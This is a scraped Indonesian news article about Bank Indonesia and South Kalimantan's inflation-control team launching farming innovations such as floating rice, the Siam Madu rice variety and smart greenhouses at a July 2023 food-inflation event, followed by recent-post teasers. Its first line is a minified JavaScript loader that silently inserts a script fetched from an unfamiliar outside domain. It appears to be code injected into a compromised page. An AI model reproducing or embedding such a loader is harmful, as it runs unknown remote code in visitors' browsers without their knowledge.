(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Selatan

Menjaga Ketahanan Pangan Kalsel dengan Inovasi Budidaya Pertanian


KANALKALIMANTAN.COM, BANJARBARU – Bank Indonesia (BI) bersama Tim Pengendali Inflasi Daerah (TPID) Kalimantan Selatan (Kalsel) meluncurkan inovasi budidaya pertanian dari sisi hulu ke hilir.

Peluncuran inovasi tersebut dirancang pada kegiatan Gerakan Nasional Pengendalian Inflasi Pangan (GNPIP) Kalimantan 2023 yang berlangsung di gedung KH Idham Khalid, perkantoran Pemprov Kalsel, Senin (10/7/2023) siang.

Inovasi budidaya pertanian yang dilakukan diantaranya gerakan budidaya dengan model padi apung dan penanaman varietas baru Padi Siam Madu, implementasi smart greenhouse dalam proses pembibitan dan manipulasi klimatologi melalui metode sungkup.

Kemudian inovasi lainnya yaitu hilirisasi pangan dengan melaksanakan capacity building bagi anggota kelompok tani untuk mendukung pengembangan produk turunan, serta on boarding penjualan melalui marketplace.

Baca juga: Ketua DPW Perindo Kalsel Mundur, Dikabarkan Nyaleg ke Partai Lain

Kegiatan peluncuran program dihadiri Deputi Gubernur Bank Indonesia (BI) Doni P Joewono yang menekankan pentingnya memperkuat sinergi dan inovasi antara tim TPIP-TPID dalam memastikan ketersediaan pasokan dan keseimbangan harga.

“Integrasi budidaya pertanian dari hulu hingga hilir hendaknya menjadi fokus rencana kerja TPID se Kalimantan sebagai upaya meningkatkan produktivitas pangan untuk menjamin ketahan pangan di IKN masa depan,” katanya.

Doni mengapresiasi gerakan dan upaya Pemerintah Provinsi Kalimantan Selatan selama ini dalam mengendalikan laju inflasi di daerah.

Terlebih berdasarkan data Badan Pangan Nasional pada tahun 2022, neraca pangan seperti beras, daging ayam di Kalsel surplus. Termasuk indeks ketahanan pangan daerah 2022 Kalsel berada di posisi 4 besar dengan angka 81,05.

Deputi Gubernur Bank Indonesia (BI) Doni P Joewono (dua dari kiri) bersama Gubernur Kalsel H Sahbirin Noor. Foto: rizki

“Kami mengapresiasi dan bergembira karena neraca pangan dan beras surplus,” kata Deputi Gubernur BI.

Dirinya mengapresiasi program Pemprov Kalsel seperti Padi Apung, Siska Ku Intip yang mengkolaborasikan antara perkebunan sawit dan peternakan sapi.

Lanjut Doni, saat ini angka inflasi Indonesia berada di angka 3,5% jauh lebih kecil dari negara di Eropa dan Amerika, sehingga pihaknya berkeyakinan pada akhir tahun 2023 laju inflasi di Indonesia akan semakin menurun.

“Kami yakin sampai akhir tahun inflasi akan berada di 3,2% sampai 3,3%,” kata Doni.

Baca juga: Operasi Patuh Intan 2023 Polres Banjar, Ini 12 Pelanggaran yang Bakal Ditilang

Sementara itu, Gubernur Kalsel Sahbirin Noor mengatakan capaian surplus pangan di Kalsel dan penghargaan lainnya merupakan hasil dari gotong royong semua pihak.

Dirinya berterimakasih kepada pemerintah pusat yang telah turun langsung ke daerah dan mendukung setiap program Pemprov Kalsel, termasuk kepada seluruh elemen masyarakat.

“Yang bergerak bukan hanya pemerintah, tapi seluruh komponen masyarakat kita. Sehingga apa yang kita rencanakan dapat terlaksana,” ujar Paman Birin -sapaan akrab Sahbirin Noor.

Kegiatan GNPIP Kalimantan 2023 juga dihadiri Deputi I Bidang Ketersediaan dan Stabilisasi Pangan Badan Pangan Nasional (Bapanas) I Ketut Astawa yang menyampaikan data pangan nasional sekaligus ikut mendukung gerakan inovasi tersebut.

Lalu pada rangkaian kegiatan dilaksanakan penandatanganan komitmen daerah se Kalimantan dalam rangka mendukung gerakan pangan murah serentak serta ditutuo dengan memanen padi apung.

Kegiatan diskusi kemudian diisi oleh narasumber Direktur Bank Indonesia Institut Putri Nurul, Staf Ahli Kemenko Perekonomian RI Ferry Irawan, Kepala Perwakilan BI Kalsel Wahyu Pratomo, dan Guru Besar Universitas Lambung Mangkurat Ahmad Yunani. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Al Ghifari

Recent Posts

Srikandi PLN UPT Palangkaraya Mengajar di SDN 5 Bukit Tunggal

KANALKALIMANTAN.COM, PALANGKARAYA – PT PLN (Persero) Unit Pelaksana Transmisi (UPT) Palangkaraya melalui gugus tugas Srikandi… Read More

1 jam ago

Pemkab HSU Gelar Peringatan Harkitnas

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan memimpin upacara peringatan… Read More

2 jam ago

‘Memakan’ Jalan, Lapak Pedagang Pasar Lama Diminta Mundur

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah pedagang yang berjualan di Pasar Lama Banjarmasin tepatnya di Jalan Pasar… Read More

2 jam ago

Komisi III Banjarbaru Minta Masterplan Mitigasi Banjir Disempurnakan

KANALKALIMANTAN.COM, BANJARBARU - Masterplan penanganan banjir di Ibu Kota Provinsi Kalimantan Selatan (Kalsel) Banjarbaru, masih… Read More

2 jam ago

Pemkab Banjar Peringati Harkitnas dan HUT ke-75 Proklamasi Gubernur Tentara ALRI Divisi IV Pertahanan Kalimantan

KANALKALIMANTAN.COM, MARTAPURA - Halaman Kantor Bupati Banjar menjadi lokasi dilaksanakannya peringatan ke-116 Hari Kebangkitan Nasional… Read More

5 jam ago

Dirut PLN Tinjau Posko Utama Kelistrikan KTT WWF, Pastikan Sistem Kelistrikan di Bali Andal

KANALKALIMANTAN.COM, DENPASAR - Direktur Utama PT PLN (Persero) Darmawan Prasodjo meninjau langsung Posko Utama Kelistrikan… Read More

5 jam ago

This website uses cookies.